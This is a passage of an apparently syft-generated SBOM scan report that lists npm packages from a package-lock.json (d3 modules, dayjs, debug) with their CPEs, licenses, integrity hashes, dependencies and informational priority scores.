- cpe: cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-ease@3.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz
|
|
integrity: sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fe1c10f297b89c50
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-format 3.1.2'
|
|
title: d3-format 3.1.2
|
|
description: 'Package discovered: d3-format 3.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5199669646af57ab
|
|
name: d3-format
|
|
version: 3.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-format@3.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz
|
|
integrity: sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d580ebf8b65eecc5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-interpolate 3.0.1'
|
|
title: d3-interpolate 3.0.1
|
|
description: 'Package discovered: d3-interpolate 3.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2bcd6b2445ac379d
|
|
name: d3-interpolate
|
|
version: 3.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-interpolate@3.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz
|
|
integrity: sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g==
|
|
dependencies:
|
|
d3-color: 1 - 3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9d53314d3544b04e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-path 3.1.0'
|
|
title: d3-path 3.1.0
|
|
description: 'Package discovered: d3-path 3.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 63d3c4d24d9be1d5
|
|
name: d3-path
|
|
version: 3.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-path@3.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz
|
|
integrity: sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 964951e667c4c379
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-scale 4.0.2'
|
|
title: d3-scale 4.0.2
|
|
description: 'Package discovered: d3-scale 4.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6f08c8eb1953f0ad
|
|
name: d3-scale
|
|
version: 4.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-scale@4.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz
|
|
integrity: sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ==
|
|
dependencies:
|
|
d3-array: 2.10.0 - 3
|
|
d3-format: 1 - 3
|
|
d3-interpolate: 1.2.0 - 3
|
|
d3-time: 2.1.1 - 3
|
|
d3-time-format: 2 - 4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fdbd8e26e660bbf2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-shape 3.2.0'
|
|
title: d3-shape 3.2.0
|
|
description: 'Package discovered: d3-shape 3.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 62919ef646dbae92
|
|
name: d3-shape
|
|
version: 3.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-shape@3.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz
|
|
integrity: sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA==
|
|
dependencies:
|
|
d3-path: ^3.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 53764226f7fa140f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-time 3.1.0'
|
|
title: d3-time 3.1.0
|
|
description: 'Package discovered: d3-time 3.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 809edf0f6cbf0d31
|
|
name: d3-time
|
|
version: 3.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-time@3.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz
|
|
integrity: sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q==
|
|
dependencies:
|
|
d3-array: 2 - 3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e86c38bd447bf3a0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-time-format 4.1.0'
|
|
title: d3-time-format 4.1.0
|
|
description: 'Package discovered: d3-time-format 4.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4c75f293b12c6086
|
|
name: d3-time-format
|
|
version: 4.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-time-format@4.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz
|
|
integrity: sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg==
|
|
dependencies:
|
|
d3-time: 1 - 3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 014411da08f2c5cc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-timer 3.0.1'
|
|
title: d3-timer 3.0.1
|
|
description: 'Package discovered: d3-timer 3.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1f58b04c062182d6
|
|
name: d3-timer
|
|
version: 3.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-timer@3.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz
|
|
integrity: sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8491d2589d2b26fe
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: dayjs 1.11.20'
|
|
title: dayjs 1.11.20
|
|
description: 'Package discovered: dayjs 1.11.20'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 11ebb955a4940d8a
|
|
name: dayjs
|
|
version: 1.11.20
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dayjs@1.11.20
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz
|
|
integrity: sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3e4836eb16baaf2c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: debug 2.6.9'
|
|
title: debug 2.6.9
|
|
description: 'Package discovered: debug 2.6.9'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 791d0c8d38a3b042
|
|
name: debug
|
|
version: 2.6.9
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/debug@2.6.9
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/debug/-/debug-2.6.9.tgz
|
|
integrity: sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==
|
|
dependencies:
|
|
ms: 2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c3870af17f8e7246
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: debug 4.4.3'
|
|
title: debug 4.4.3
|
|
description: 'Package discovered: debug 4.4.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 96b0606cb5228062
|
|
name: debug
|
|
version: 4.4.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/debug@4.4.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/debug/-/debug-4.4.3.tgz
|
|
integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==
|
|
dependencies:
|
|
ms: ^2.1.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6cb9876ddd023a8b
|
|
